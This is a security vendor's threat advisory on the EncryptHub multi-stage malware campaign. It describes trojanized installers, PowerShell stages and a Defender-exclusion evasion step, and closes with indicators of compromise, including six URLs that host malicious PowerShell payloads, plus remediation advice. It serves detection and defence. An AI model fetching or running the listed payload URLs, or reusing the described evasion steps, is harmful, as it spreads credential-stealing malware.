Request a Demo
Rewterz
Multiple QNAP Products Vulnerabilities
March 11, 2025
Rewterz
Strela Stealer Malware Targets Microsoft Outlook Users for Credential Theft – Active IOCs
March 11, 2025

EncryptHub: A Multi-Stage Malware Breach Impacting 600 Organizations – Active IOCs

Severity

High

Analysis Summary

EncryptHub, a highly sophisticated cybercriminal group, has compromised around 600 organizations through a multi-stage malware campaign. The attackers leveraged multiple layers of PowerShell scripts to gather system data, exfiltrate sensitive information, evade detection, and deploy information stealers. Their primary infection method involved trojanized versions of widely used applications, including QQ Talk, WeChat, Microsoft Visual Studio 2022, and Palo Alto Global Protect. These fake applications were generated between November 25th, 2024, and January 1st, 2025, and were signed with code-signing certificates, initially issued to “HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY” before being revoked. By February 4th, 2025, the group had switched to a new certificate registered under “Encrypthub LLC,” showcasing their adaptability.

A key aspect of EncryptHub’s operation is its use of third-party distribution channels to maximize reach. They utilized a pay-per-install service called “LabInstalls,” operating via a Telegram bot, allowing them to automate malicious payload distribution. According to Researchers, EncryptHub strategically prioritizes stolen credentials based on cryptocurrency ownership, corporate affiliations, and the presence of VPN software, reflecting a highly targeted approach. Researchers also discovered operational security lapses by the attackers, inadvertently exposing critical infrastructure details, which allowed security analysts to map EncryptHub’s tactics in depth.

The attack sequence begins with a PowerShell command fetching the first-stage payload from a compromised domain, designed to steal credentials from messaging applications, crypto wallets, password managers, and VPN clients. The second stage involves a PowerShell script, runner.ps1, which processes base64-encoded MSC files to embed malicious URLs. In the third stage, an HTML-based loader manipulates Windows Defender settings to exclude the TEMP folder from scanning while downloading additional scripts. The final stage delivers Rhadamanthys malware, completing the infection chain and ensuring persistent access.

EncryptHub’s activities indicate ongoing evolution, with researchers detecting the development of “EncryptRAT,” a remote access Trojan designed for centralized command-and-control operations. This suggests the group may soon commercialize its malware as a service for other cybercriminals. Organizations are urged to implement robust security measures, including endpoint detection, multi-layered defenses, and continuous monitoring, to defend against this rapidly evolving threat landscape.

Impact

  • Exfiltrate Sensitive Information
  • Evade Detection
  • Gain Access

Indicators of Compromise

IP

  • 45.131.215.16

  • 64.95.13.166

  • 82.115.223.199

  • 185.215.113.97

  • 31.41.244.11

  • 185.215.113.39

MD5

  • 40c33d6796a0092c1ea09650a254370b

  • e295d3217ccd1310cfb3f599758f41ff

  • 9747203f97be19e5e4445dba62035f1a

  • f6b7467e9067d20e853d682989582e81

  • 87792cf4bd370f483a293a23c4247c50

  • 832b3d652330366ce49ed4667bc43f0b

  • 5488c867b16fa0ff44dc975caf8e5f8e

  • e2d005af8f840f371ab2cef870dacbcf

  • 6522aad0b04cb58ab8cf30b3a8578fb1

SHA-256

  • 532f4c9c72f1c77531a55f7811371aa65f85fc3a768d792482cab3381cdd29b3

  • 37bf1269a21cba22af239e734de043f1d08d61b44414bcf63b1b9198e6a8bc87

  • 7d222bb62ae995479f05d4bddaa0b7d6dd7ade8d9c438214b00cc1d1be9b9db1

  • cc70570dd68a01ef43497c13ea7e5620256208b73bd1e4487f3bf0c91617169f

  • 725df91a9db2e077203d78b8bef95b8cf093e7d0ee2e7a4f55a30fe200c3bf8f

  • c124f307ffbfdba7190c0df9651e895c720962094a78a0af347b2f1e7a8962d0

  • 90b7b711f56f00a1fa08a7a29f2cd8602b8aa1a0d78986dbfc9f64e38ac6cecd

  • 1bce694f9f811982eb01d381a69cdd56c3fa81d113e41b5acb902ec66ec942b1

  • 411e6413afc5dadc63f69dd37d25f23dfee1fbd5eff1a591ba33dfc38ca5a4fd

SHA1

  • 4fe2536fe0ac8e04ccceb1769e33fe3dff96e2a4

  • 47347a8c85d90e2eb5dc966f305c596009f41128

  • 6a66d2e6441acfa331ea428a4e3fad352afa82c6

  • d94ea984003734cde0d50f981de47d35a2638d16

  • a225bee48074feac53c7cb2f3929a41f7b4a71d3

  • 9bd0b7a37a0791e7ff6bc270d18d3fbd887752c8

  • 46d79522034154848935839619d622cb56297bc3

  • c1bd7bc905fee7f749329fbd70fd8fd37319b300

  • d4ece3957927d4440a43a00a7c0d30ea21238809

URL

  • http://185.215.113.97/files/5094364719/LR8QUOU.ps1
  • http://31.41.244.11/files/5094364719/WClchuE.ps1
  • http://185.215.113.39/files/5094364719/7GVy9sB.ps1
  • http://31.41.244.11/files/5094364719/wclchue.ps1
  • http://31.41.244.11/files/5094364719/wVjWGck.ps1
  • http://185.215.113.39/files/5094364719/pcuy9xE.ps1

Remediation

  • Block all threat indicators at your respective controls.
  • Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
  • Deploy advanced endpoint detection and response (EDR) solutions.
  • Regularly update and patch all software, especially security tools.
  • Enforce multi-factor authentication (MFA) for all user accounts.
  • Limit administrative privileges and use role-based access control (RBAC).
  • Implement network segmentation to contain threats.
  • Use email filtering and attachment scanning to detect phishing attempts.
  • Continuously monitor logs for unusual authentication attempts and data exfiltration.
  • Set up alerts for PowerShell execution and unauthorized system modifications.
  • Verify software integrity before installation; avoid downloading from untrusted sources.
  • Revoke and replace any compromised digital certificates.
  • Conduct regular security awareness training on phishing and social engineering threats.
  • Educate employees on identifying trojanized applications and suspicious downloads.
  • Maintain regular offline backups of critical data.
  • Develop and test an incident response plan for malware infections.